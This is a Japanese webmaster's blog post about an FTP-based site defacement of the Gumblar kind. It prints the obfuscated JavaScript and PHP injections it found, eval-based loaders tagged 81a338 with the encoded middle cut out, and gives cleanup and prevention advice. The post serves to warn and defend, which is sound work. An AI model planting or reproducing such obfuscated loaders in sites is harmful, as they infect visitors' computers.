WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

掲示板 情報商材 Newpost Catch 株式会社SRシステム 加藤 秀吉 BUYMA 放射線 申請金ビジネス 三橋美仁 High Concept Marketing コピーボタン ヤフオク functions.php 無断送信 SyntaxHighlighter 自動化 感染 大西良幸 MT ネットビジネス最後の楽園 エクスチェンジ リンクシェイカー MasterCollection 無料 iphone 定型文 インターネットエクスプローラー クラウド入力機能 テンプレート サンタ クラック followmatic バイマ @PAGES Login LockDown Tiger-Wing wordpress html スマホ RSS Includes Pages メルマガ配信システム 短縮URLツール getElementByTagName RMT Baidu 秀吉塾天下統一 日本語入力変換ソフト 詐欺組織 google 比較 ソースコード もざ 特定のメールアドレス エディタ ライブチャット KMSpico エクスプローラー 到達率 ECサイト ブルートフォースアタック 登録禁止 ウイルス ぼかし RSS スカイプ force puzzle サイト改ざん 株式会社バンザイ アフィ匠 フォローマティック がら空きビジネス 人物 ロリポップ 賢威 伊藤塾 セキュリティ 高額塾 タイガーウイング Internet Explorer 株式会社ニュース ランキング 大園麗花 Diamond Affiliate Masters Program Favicon 改竄 プロファイル WEB スクロール Chrome ファビコン ユーチューブマニアクス2017 Yahoo インフォトップ 与沢翼 Line 固定ページ 大園式転売塾 twitter android 池田純矢 ブロックポリシー ツール ヤフーショッピング 詐欺 CGI ネットショップ Wordpress Content Slide ビジネス MovableTYpe 滑らか 短縮URL レイアウト崩れ ムーバブルタイプ ping送信 HTML4.0 原田真 アンダーグラウンドメソッド 株式会社Free Agent Style PHP 新井浩 関根義光 JavaScript XHTML トラフィック パズル wp-login.php レイアウト 株式会社A-ブログレス シャンプー 流出 テーマ ブラウザ 大園転売塾 自己アフィリエイト css CS5 カスタマイズ WP メモ エキスパートメール マイクロソフト インターネット Windows ネットガレージ バックアップ CS6 アレックス 脆弱性 中山秀人 クリックランキング IE やしろ塾 アイコン moza 権利収入 Youtube 特権ビジネス 画像 インペリアルゴールド BBIZ スタイルシート 株式会社SRシステム プロモーション レタープレス 高速ゲーム SEO Thunderbird スムーズ 土屋ひろし レンタルサーバー 山下 ping DOCTYPE アクセス制限 アレックス式ネオせどりスクール マニュアル ブロック IP ざくざく君 表示 wpXサーバー トレンドキーワード バイドゥー せどり プラグイン 伊藤 歩 ソース getElementById postpost .htaccess やしろひろたみ ボタン 改ざん LinkShaker ネットビジネス 既得権益 自動 ネットゲーム Ban Hammer 無料オファー 小笠原健一 ワードプレス 宮田麗花 上位表示 グラデーション マルウエア 管理ツール 音量アイコン 個人情報流出 SKナレッジ 副業術 トレンドアフィリエイト 立体 関根塾 explorer ライオンアフィリエイト FireWorks フレンドシップメール YouTube Maniax 2017 村上省吾 ブラクラ バナー クラウド変換 document.all クロスアフィリエイト ライン モザイク ヤフー ネットビジネス大全集 北川 雅嗣 不正アクセス 配布 IBS Cash on Wordpress KMS認証 百度 秒速で1億円稼ぐ男 ソフト アドセンス 量産 EC 不労所得の神 伊藤 虎太郎 切り抜き 久積篤史 アクセスアップ 自己アフィリ 不正送信 Firefox 優先順位 system Agency Business tool 石井匠 Extension Manager 管理画面 転売大園塾 タスクバー SmoothScroll.js ブラシ Google Maps 復元 加工 DTD 切抜き 蝶乃舞 個人情報 レビュー FTP ハート 81a338 Windows 7 デスクトップ アフィリエイト Google Maps API PPC アンダーグラウンドアフィリエイトクラブ 背景 与沢翼×蝶乃舞 インターネットビジネススクール ドメイン ツイッター ネオヒルズアカデミー ウインドウ office 株式会社WINGOOD 球体 Adobe 伊藤虎太郎 出店料

アーカイブ

エステトラブル

このページの先頭へ